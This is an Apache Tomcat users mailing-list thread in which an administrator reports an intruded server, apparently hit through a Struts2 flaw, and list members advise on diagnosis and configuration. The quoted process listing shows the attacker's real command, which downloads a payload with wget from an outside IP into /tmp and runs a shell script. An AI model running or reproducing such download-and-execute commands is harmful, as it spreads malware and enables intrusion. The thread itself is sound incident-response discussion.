On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini <lsantagost...@gmail.com> wrote: >Hello list, > >well my homework is done > >Here are the links: > >setenv.sh: http://pastebin.com/EN1mXDFi >catalina.sh: http://pastebin.com/1vRVLbSm >web.xml: http://pastebin.com/BqEfiXXm >server.xml: http://pastebin.com/wfzE8bYU >logging.properties: http://pastebin.com/Qurk8sLU >catalina.properties: http://pastebin.com/jkfY1ZRQ >tree + logsfiles: http://pastebin.com/j3tip4ij
>From the logfiles it looks like you have struts2 applications. It might be >that you are hit by a security problem within struts2 ( Konstantin forwarded a >warning a few days ago >http://tomcat.10.x6.nabble.com/Fwd-ANN-Struts-2-up-to-2-3-16-1-Zero-Day-Exploit-Mitigation-security-critical-td5016578.html > ). > >Note that logsfiles, are not the logfiles itsef but only a ls -lah >(just >for you to see the logsizes) > >A little more about the infraestructure i've mounted ill do some ascii >art. > > >internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk >(3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7) That seems a bit too complex. In my eyes you need no haproxy between httpd and tomcat when you use mod_jk. Regards Felix > > >Apache(2) is serving static content so haproxy(1) at the first level >does >http round robin balancing >Apache(2) connects to tomcat(5) through haproxy(4) (using L4 >connection) >using mod_jk(3) >Tomcat(5) are the main app server (the ones gets intruded) who uses >tomcat(7) (solr service) using haproxy(6) using L4 connection. > >Versions: > >Apache: 2.2.17 >mod_jk: 1.2.31 >haproxy: 1.4.22 >Tomcat: 7.0.53 >Java: 1.6.0.41 > >[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version >java version "1.6.0_41" >Java(TM) SE Runtime Environment (build 1.6.0_41-b02) >Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode) > >OS: CentOS 5.8 64 bit > >[root@arcbaappvrt05 tomcat]# uname -a >Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb >21 >20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux >[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release >CentOS release 5.8 (Final) >[root@arcbaappvrt05 tomcat]# > >For now i havent see that the squid process whas launched so i couldnt >do a >dump > >Letme know if you need more information. > >BTW, pastebin links will work for one week. > >Kind regards, yours > > > > >Saludos.- >Leonardo Santagostini > ><http://ar.linkedin.com/in/santagostini> > > > > > >2014-04-30 11:09 GMT-03:00 Leonardo Santagostini ><lsantagost...@gmail.com>: > >> Ok, i will do the following: >> >> 1) thread dump of running tomcat instance >> 2) Pastebin the running tomcat config >> >> I think at mid day will have all the info. >> >> Thanks all for replying me and all the responses. >> >> Regards, Leonardo >> >> Saludos.- >> Leonardo Santagostini >> >> <http://ar.linkedin.com/in/santagostini> >> >> >> >> >> >> 2014-04-30 10:55 GMT-03:00 Christopher Schultz < >> ch...@christopherschultz.net>: >> >> -----BEGIN PGP SIGNED MESSAGE----- >>> Hash: SHA256 >>> >>> Konstantin, >>> >>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote: >>> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini >>> > <lsantagost...@gmail.com>: >>> >> Hello Dan, >>> >> >>> >> Nop, the attacker is executing locally the following >>> >> >>> >> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh >>> >> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget >>> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid >>> >> >>> >> And the launch squid who tries to connect via ssh to varoius >>> >> places. >>> >> >>> >> Right now its time to leave the office, but in a few hours i will >>> >> paste in pastebin access logs, config files, wherever you tell >>> >> me. >>> >> >>> >> This is my pstree >>> >> >>> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd >>> >> ├─java─┬─sh───wget │ └─263*[{java}] >>> > >>> > sh launched by tomcat's java? >>> >>> Yes: please verify that it's the JVM running Tomcat, and not just >any >>> JVM process. >>> >>> > Take a thread dump: >>> > >>> >https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F >>> > >>> > It shall show what is stacktrace in thread that launched external >>> > process. >>> >>> +1 >>> >>> The only things that ship with Tomcat that call Process.exec() are >the >>> CGI servlet and SSI, both of which are disabled by default. So, >either >>> you have an insecure CGI/SSI configuration, your web application has >a >>> vulnerability, or you have deployed something like the Manager >>> application and improperly-secured it. >>> >>> A classic example of such an intrusion might be that someone got a >>> foothold elsewhere into your network, and the Manager web >application >>> is not properly secured with a password, etc. >>> >>> - -chris >>> -----BEGIN PGP SIGNATURE----- >>> Version: GnuPG v1 >>> Comment: GPGTools - http://gpgtools.org >>> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ >>> >>> iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp >>> +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4 >>> HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC >>> D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o >>> gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr >>> BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS >>> ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj >>> UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb >>> TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W >>> WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7 >>> 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12 >>> lvJcfOhzHLwo07Pv+y3J >>> =EiX9 >>> -----END PGP SIGNATURE----- >>> >>> >--------------------------------------------------------------------- >>> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org >>> For additional commands, e-mail: users-h...@tomcat.apache.org >>> >>> >> --------------------------------------------------------------------- To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org